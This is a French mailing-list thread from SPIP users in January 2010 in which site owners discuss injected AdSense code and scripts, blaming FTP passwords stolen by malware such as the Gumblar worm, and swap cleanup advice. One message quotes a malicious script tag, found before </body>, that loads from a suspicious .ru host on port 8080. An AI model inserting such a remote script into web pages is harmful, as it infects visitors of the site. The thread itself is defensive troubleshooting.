piratage de site spip

Bonjour,
c’est la deuxième fois que mon site se fait piraté.
Le piratage consiste à ajouter des pubs adsense sur dans le fichier spip.php :[
Mon spip est à jour.
J’ai déclaré cela à google.
Mais j’aimerais savoir ce que je peux faire pour sécuriser mon site.
Mon hébergeur (trusttelecom) semble désigner spip comme la faille
et pense que cela provient de droit sur un fichier ou dossier.
qu’est ce que je peux faire?


William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations

web : www.monsieurpixel.com
blog : blog.monsieurpixel.com
tel : 06 12 38 66 65

Bonjour,

Est-ce que ça ne serait pas plutôt euh qui aurait une faille de sécurité dans leur système? Une faille ftp?

Car jusqu’à maintenant, je n’ai pas entendu parlé d’un problème de ce genre chez SPIP… (Mais on n’est à l’abris de rien…)

Quel est le contenu du fichier spip.php piraté? De plus, l’hébergeur devrait avoir des logs de tout cela. Connaître à quel moment le fichier spip.php a été modifié entre autre… Cela permettrait de mieux cerner le problème. Et s’ils ne sont pas capables de répondre à cela, c’est qu’il y a anguille sous roche…

Le 18 janv. 10 à 01:00, William Pezet a écrit :

Bonjour,
c’est la deuxième fois que mon site se fait piraté.
Le piratage consiste à ajouter des pubs adsense sur dans le fichier spip.php :[
Mon spip est à jour.
J’ai déclaré cela à google.
Mais j’aimerais savoir ce que je peux faire pour sécuriser mon site.
Mon hébergeur (trusttelecom) semble désigner spip comme la faille
et pense que cela provient de droit sur un fichier ou dossier.
qu’est ce que je peux faire?


William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations

web : www.monsieurpixel.com
blog : blog.monsieurpixel.com
tel : 06 12 38 66 65


liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
http://archives.rezo.net/spip.mbox/

Documentation de SPIP : http://www.spip.net/

Irc : de l’aide à toute heure : http://spip.net/irc

Bonjour,

La version de SPIP sur le serveur n’est peut-être pas à jour : http://www.spip-blog.net/Alerte-securite-SPIP-nouvelle.html

Au plaisir

Yves Duchesne
Conseiller pédagogique TIC
http://www.planete-education.com/recit/
http://robotique.planete-education.com/
http://semantice.planete-education.com/
etc.

Le 17 janvier 2010 19:13, Teddy Payet <teddy.spip@gmail.com> a écrit :

Bonjour,

Est-ce que ça ne serait pas plutôt euh qui aurait une faille de sécurité dans leur système? Une faille ftp?

Car jusqu’à maintenant, je n’ai pas entendu parlé d’un problème de ce genre chez SPIP… (Mais on n’est à l’abris de rien…)

Quel est le contenu du fichier spip.php piraté? De plus, l’hébergeur devrait avoir des logs de tout cela. Connaître à quel moment le fichier spip.php a été modifié entre autre… Cela permettrait de mieux cerner le problème. Et s’ils ne sont pas capables de répondre à cela, c’est qu’il y a anguille sous roche…

Le 18 janv. 10 à 01:00, William Pezet a écrit :

Bonjour,
c’est la deuxième fois que mon site se fait piraté.
Le piratage consiste à ajouter des pubs adsense sur dans le fichier spip.php :[
Mon spip est à jour.
J’ai déclaré cela à google.
Mais j’aimerais savoir ce que je peux faire pour sécuriser mon site.
Mon hébergeur (trusttelecom) semble désigner spip comme la faille
et pense que cela provient de droit sur un fichier ou dossier.
qu’est ce que je peux faire?


William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations

web : www.monsieurpixel.com
blog : blog.monsieurpixel.com
tel : 06 12 38 66 65


liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
http://archives.rezo.net/spip.mbox/

Documentation de SPIP : http://www.spip.net/

Irc : de l’aide à toute heure : http://spip.net/irc


liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
http://archives.rezo.net/spip.mbox/

Documentation de SPIP : http://www.spip.net/

Irc : de l’aide à toute heure : http://spip.net/irc

Quelle version ?

Le Lundi 18 Janvier 2010 01:00:41 William Pezet <monsieurpixel@gmail.com>, dans un message intitulé "[Spip] piratage de site spip" nous a informés :

Bonjour,
c'est la deuxième fois que mon site se fait piraté.
Le piratage consiste à ajouter des pubs adsense sur dans le fichier spip.php :[
Mon spip est à jour.
J'ai déclaré cela à google.
Mais j'aimerais savoir ce que je peux faire pour sécuriser mon site.
Mon hébergeur (trusttelecom) semble désigner spip comme la faille
et pense que cela provient de droit sur un fichier ou dossier.
qu'est ce que je peux faire?

--
William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations
---------------------------------------------------------
web : www.monsieurpixel.com <http://www.monsieurpixel.com>
blog : blog.monsieurpixel.com <http://blog.monsieurpixel.com>
tel : 06 12 38 66 65
------------------------------------------------------------------------

_______________________________________________
liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net

Documentation de SPIP : http://www.spip.net/

Irc : de l'aide à toute heure : http://spip.net/irc

--
****Fin du message end - Signature****
Perline

spip@perline.org – http://perline.org/

Ce message est couvert par le secret de la correspondance
(art. 226-15 et 432-9 du Code pénal)
********************************************

eh bien il semble bien je sois victime du même problème, en regardant dans firebug le code généré, je viens de trouver cela tout en bas, juste avant le </body>

<script defer="defer" type="text/javascript" id="Nn3d53aljff" src="http://chase-com.ebay.fr.ebay-co-uk.carswebnet.ru:8080/google.com/google.com/allegro.pl/oricon.co.jp/getiton.com/&quot;/&gt;&lt;/script&gt;

qui nest évidemment pas de mon fait et qui n'apparait dans aucun de mes squelettes ni dans spip.php

mon spip est à jour, version 2.0.10, et j'ignore totalement si ce code était présent préalablement ni si cela provient vraiment de spip, ce site est hébergé sur un serveur dédié qui possède d'autres spip, peut être pas tous mis à jour (je vais prévenir l'admin de suite) et une attaque a été signalée sur ce serveur il y a une semaine, toutes les traces n'ont peut être pas été nettoyées.

Je ne peux pas filer le lien du site sur lequel je bosse pour éviter qu'il soit référencé avant d'être terminé, mais si quelqu'un veut en savoir plus, je peux envoyer l'adresse en mail privé,

cordialement,

troOn

Planète-éducation a écrit :

Bonjour,

La version de SPIP sur le serveur n’est peut-être pas à jour : http://www.spip-blog.net/Alerte-securite-SPIP-nouvelle.html

Au plaisir

Yves Duchesne
Conseiller pédagogique TIC
http://www.planete-education.com/recit/
http://robotique.planete-education.com/
http://semantice.planete-education.com/
etc.

Le 17 janvier 2010 19:13, Teddy Payet <teddy.spip@gmail.com <mailto:teddy.spip@gmail.com>> a écrit :

    Bonjour,

    Est-ce que ça ne serait pas plutôt euh qui aurait une faille de
    sécurité dans leur système? Une faille ftp?

    Car jusqu'à maintenant, je n'ai pas entendu parlé d'un problème de
    ce genre chez SPIP... (Mais on n'est à l'abris de rien...)

    Quel est le contenu du fichier spip.php piraté? De plus,
    l'hébergeur devrait avoir des logs de tout cela. Connaître à quel
    moment le fichier spip.php a été modifié entre autre... Cela
    permettrait de mieux cerner le problème. Et s'ils ne sont pas
    capables de répondre à cela, c'est qu'il y a anguille sous roche...

    Le 18 janv. 10 à 01:00, William Pezet a écrit :

    Bonjour,
    c'est la deuxième fois que mon site se fait piraté.
    Le piratage consiste à ajouter des pubs adsense sur dans le
    fichier spip.php :[
    Mon spip est à jour.
    J'ai déclaré cela à google.
    Mais j'aimerais savoir ce que je peux faire pour sécuriser mon site.
    Mon hébergeur (trusttelecom) semble désigner spip comme la faille
    et pense que cela provient de droit sur un fichier ou dossier.
    qu'est ce que je peux faire?

    -- William Pezet // Monsieur Pixel
    Sites Internet / Multimédia / Formations
    ---------------------------------------------------------
    web : www.monsieurpixel.com <http://www.monsieurpixel.com>
    blog : blog.monsieurpixel.com <http://blog.monsieurpixel.com>
    tel : 06 12 38 66 65
    _______________________________________________
    liste spip
    spip@rezo.net <mailto:spip@rezo.net> - désabonnement : envoyer un
    mail à spip-off@rezo.net <mailto:spip-off@rezo.net>

    Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
    Discuter chez rezo.net

    Documentation de SPIP : http://www.spip.net/

    Irc : de l'aide à toute heure : http://spip.net/irc

    _______________________________________________
    liste spip
    spip@rezo.net <mailto:spip@rezo.net> - désabonnement : envoyer un
    mail à spip-off@rezo.net <mailto:spip-off@rezo.net>

    Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
    Discuter chez rezo.net

    Documentation de SPIP : http://www.spip.net/

    Irc : de l'aide à toute heure : http://spip.net/irc

------------------------------------------------------------------------

_______________________________________________
liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net

Documentation de SPIP : http://www.spip.net/

Irc : de l'aide à toute heure : http://spip.net/irc

* William Pezet tapuscrivait, le 18/01/2010 01:00:

Bonjour,
c'est la deuxième fois que mon site se fait piraté.
Le piratage consiste à ajouter des pubs adsense sur dans le fichier spip.php
:[
Mon spip est à jour.
J'ai déclaré cela à google.
Mais j'aimerais savoir ce que je peux faire pour sécuriser mon site.
Mon hébergeur (trusttelecom) semble désigner spip comme la faille
et pense que cela provient de droit sur un fichier ou dossier.
qu'est ce que je peux faire?

L'origine de l'infection est peut-être quelque chose comme : Sécurité : attention au ver Gumblar - ZZZ

A voir de ce côté là aussi.

--
RealET

je suis bien en SPIP 2.0.10
Donc pas de problème de mise à jour.
Effectivement un vol de code ftp par un malaware ou un problème du côté de l’hébergeur
me paraissent plus plausible.
Mais je gère plusieurs sites et un seul est touché. et c’est le seul qui est chez cet hébergeur.

William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations

web : www.monsieurpixel.com
blog : blog.monsieurpixel.com
tel : 06 12 38 66 65

Le 18 janvier 2010 02:46, Perline-Spip <spip@perline.org> a écrit :

Quelle version ?

Le Lundi 18 Janvier 2010 01:00:41 William Pezet <monsieurpixel@gmail.com>, dans un message intitulé « [Spip] piratage de site spip » nous a informés :

Bonjour,
c’est la deuxième fois que mon site se fait piraté.
Le piratage consiste à ajouter des pubs adsense sur dans le fichier spip.php :[
Mon spip est à jour.
J’ai déclaré cela à google.
Mais j’aimerais savoir ce que je peux faire pour sécuriser mon site.
Mon hébergeur (trusttelecom) semble désigner spip comme la faille
et pense que cela provient de droit sur un fichier ou dossier.
qu’est ce que je peux faire?


William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations

web : www.monsieurpixel.com <http://www.monsieurpixel.com>
blog : blog.monsieurpixel.com <http://blog.monsieurpixel.com>

tel : 06 12 38 66 65



liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
http://archives.rezo.net/spip.mbox/

Documentation de SPIP : http://www.spip.net/

Irc : de l’aide à toute heure : http://spip.net/irc


Fin du message end - Signature
Perline
spip@perline.orghttp://perline.org/

Ce message est couvert par le secret de la correspondance
(art. 226-15 et 432-9 du Code pénal)


Le 18.01.2010 04:30, Younès Benjelloun a écrit :

eh bien il semble bien je sois victime du même problème, en regardant
dans firebug le code généré, je viens de trouver cela tout en bas, juste
avant le </body>

<script defer="defer" type="text/javascript" id="Nn3d53aljff"
src="http://chase-com.ebay.fr.ebay-co-uk.carswebnet.ru:8080/google.com/google.com/allegro.pl/oricon.co.jp/getiton.com/&quot;/&gt;&lt;/script&gt;

Laisse tomber, ce n'est pas une faille spip, c'est juste que tu as
laisser trainer tes mots de passe FTP sur une machine windows vérolée..

La solution est donc d'au moins changer le mot de passe FTP, et vérifier
tes fichiers...

a+.

Je trouve la thèse de la vérole sur windows qui récupère des codes ftp valable.
Mais j’ai une vingtaine de sites enregistrés dans mon client ftp et seul un site est touché…

Le 18 janvier 2010 12:19, Jean-Paul Chiron <chiron@tic.aquitaine.fr> a écrit :

Le 18.01.2010 04:30, Younès Benjelloun a écrit :

eh bien il semble bien je sois victime du même problème, en regardant
dans firebug le code généré, je viens de trouver cela tout en bas, juste
avant le

Laisse tomber, ce n’est pas une faille spip, c’est juste que tu as
laisser trainer tes mots de passe FTP sur une machine windows vérolée…

La solution est donc d’au moins changer le mot de passe FTP, et vérifier
tes fichiers…

a+.


liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
http://archives.rezo.net/spip.mbox/

Documentation de SPIP : http://www.spip.net/

Irc : de l’aide à toute heure : http://spip.net/irc


William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations

web : www.monsieurpixel.com
blog : blog.monsieurpixel.com
tel : 06 12 38 66 65

William Pezet a écrit :

Je trouve la thèse de la vérole sur windows qui récupère des codes ftp valable.
Mais j'ai une vingtaine de sites enregistrés dans mon client ftp et seul un site est touché...

un seul site est touché "pour l'instant"...
maintenant ton code a peut etre été utilisé sur une autre machine qui elle est vérolée ?
Ca peut aussi etre une faille du serveur FTP de l'hebergeur, pour en avoir le coeur net, il faut demander les logs FTP à l'heure ou ton fichier a été modifié, mais il y a de fortes chances pour que tu y trouves des accès depuis plusieurs IP entrant avec le bon login/password....

A ta place je changerai tous les mots de passe...

Bonjour,

Le 18/01/2010 13:57, William Pezet a écrit :

Je trouve la thèse de la vérole sur windows qui récupère des codes ftp
valable.
Mais j'ai une vingtaine de sites enregistrés dans mon client ftp et seul
un site est touché...

Je me suis pris le premier virus de ma vie informatique (en 20 ans) il y a 10 jours. L'anti-virus du boulot l'avait laissé passer (Trend Micro), c'est Avast familial gratuit qui l'a détecté.

Il a récupéré le mot de passe FTP d'un site juste créé le 7 janvier et modifié tous les JS du site.
Aucun autre site touché, peut-être car je n'y ai pas accédé par ftp. J'imagine qu'il n'a pas relu le mot de passe dans le logiciel, mais intercepté (hook) la connexion ftp pour récupérer l'identifiant.

--
Stéphane

Jeune Chambre Economique : se former en servant la communauté
  http://www.jce-saintes.org - http://www.jce-poitoucharentes.org

    BTS Electrotechnique *** http://enselec.santonum.eu

Bonjour,

Idem pour moi dans la nuit du 19.
Plusieurs sites sous Spip mais j'en ai qu'un où je rentre régulièrement mon
password.
SPIP à jour.
2 fichiers dans le dossier squelette ont été crée :
inc-entete
sommaire
avec des codes de pub google
google_ad_client = "pub-9289893342410893"

J'ai changé mon password mais maintenant, le site est tombé en travaux :
Site en travaux
Attention : un problème technique (serveur SQL) empêche l'accès à cette partie
du site. Merci de votre compréhension.

Je me demande si je dois pas réinstaller spip ?

A voir pour la suite.

Eric a écrit :

Bonjour,

Idem pour moi dans la nuit du 19.
Plusieurs sites sous Spip mais j'en ai qu'un où je rentre régulièrement mon
password.
SPIP à jour.
2 fichiers dans le dossier squelette ont été crée :
inc-entete
sommaire
avec des codes de pub google
google_ad_client = "pub-9289893342410893"

J'ai changé mon password mais maintenant, le site est tombé en travaux :
Site en travaux
Attention : un problème technique (serveur SQL) empêche l'accès à cette partie
du site. Merci de votre compréhension.

Je me demande si je dois pas réinstaller spip ?

pour ton "probleme technique", non, il suffit de mettre à jour le mot de passe dans config/connect.php

Mais par principe, quand on se fait pirater, mieux vaut réinstaller les repertoires spip et les plugins et passer au peigne fin /squelettes et /IMG

@++